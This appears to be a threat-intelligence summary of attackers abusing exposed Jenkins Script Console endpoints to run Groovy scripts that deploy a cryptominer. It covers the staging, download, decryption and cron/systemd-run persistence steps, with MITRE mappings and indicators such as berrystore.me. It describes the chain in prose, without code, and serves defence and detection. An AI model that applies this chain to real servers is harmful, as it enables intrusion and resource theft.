Attackers can weaponize Jenkins Script Console to execute malicious Groovy scripts, enabling cryptomining and backdoors when Jenkins is misconfigured. The analysis explains how exposed /script endpoints and misconfigurations allow RCE, followed by a multi-stage mining payload deployment with persistence via cron and systemd-run. #Jenkins #ScriptConsole #Groovy #cryptomining #BusyBox #berrystore.me #systemd-run #cron
Keypoints
- Attackers can weaponize Jenkins Script Console to run malicious Groovy scripts for cryptomining.
- Misconfigurations exposing the /script endpoint enable remote code execution and misuse by attackers.
- The mining operation and persistence chain start from a Base64-encoded payload executed via Groovy scripts.
- The attacker checks for BusyBox and then searches for writable/executable directories to stage the miner.
- If no suitable location is found, the attacker uses /tmp (with a duet directory set to 777) for operations.
- Downloader methods include wget or OpenSSL s_client over TLS to fetch the miner, followed by AES-256 decryption and tar extraction.
- Persistence is achieved with cron jobs (using flock) and systemd-run scheduling, ensuring a single miner instance runs.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers exploit misconfigured public-facing interface to gain RCE. ‘Misconfigurations such as improperly setup authentication mechanisms expose the /script endpoint to attackers. This can lead to remote code execution (RCE).’
- [T1057] Process Discovery – Script checks BusyBox and exits if detected. ‘First, this script checks whether it is running BusyBox, which if detected, will exit from the script:’
- [T1083] File and Directory Discovery – Attacker searches for writable/executable locations to host the miner. ‘Next, the attacker searches for locations where the miner can be downloaded and executed. First, it checks if the current user can write and execute the miner under the /dev/shm directory using the svalid() function; if the function returns a non-zero exit status (indicating the directory is not writable and executable), it then searches for other directories except /proc and /sys.’
- [T1222.002] File and Directory Permissions Modification – Creates a directory with broad permissions to host the miner. ‘…creates a sub directory named duet, assigning it maximum permissions (777).’
- [T1140] Deobfuscate/Decode Files or Information – Decodes a Base64-encoded string that is a malicious script. ‘the Base64-encoded string, which is actually a malicious script.’
- [T1105] Ingress Tool Transfer – Downloads the miner binary from external sources. ‘downloads the cryptominer binary… It uses wget to download the binary.’
- [T1071.001] Application Layer Protocol: Web Protocols – Transfers data over HTTPS/TLS to fetch payload. ‘This command sends an HTTPS GET request to the server, then retrieves the server’s response…’
- [T1053.003] Cron – Uses cron to achieve persistence. ‘It uses the flock system utility to lock the file, and the /var/tmp/verl.lock file to ensure that only one instance is running at a time’
- [T1053.006] Systemd Timers – Uses systemd-run to schedule miner execution. ‘The systemd-run command uses … to schedule the execution of a cryptocurrency mining application at the beginning of every hour.’
- [T1496] Resource Hijacking – The end goal is cryptocurrency mining. ‘to harvest cryptocurrencies’ (cryptomining).
Indicators of Compromise
- [Domain] berrystore.me – Domain used to host the encrypted miner payload. ‘from https://berrystore.me’ referenced as the source of the tar payload.
- [File] cex – Miner binary; checked for presence and later executed. ‘The miner binary… cex file name’.
- [File] vinars – Temporary shell script created during execution. ‘creates a temporary shell script named vinars in the specified directory.’
- [Directory] /dev/shm – Writable directory checked for mining operations. ‘the current user can write and execute the miner under the /dev/shm directory’.
- [Directory] /tmp – fallback operational directory with a subdirectory named duet set to 777. ‘uses /tmp for operations and creates a sub directory named duet, assigning it maximum permissions (777).’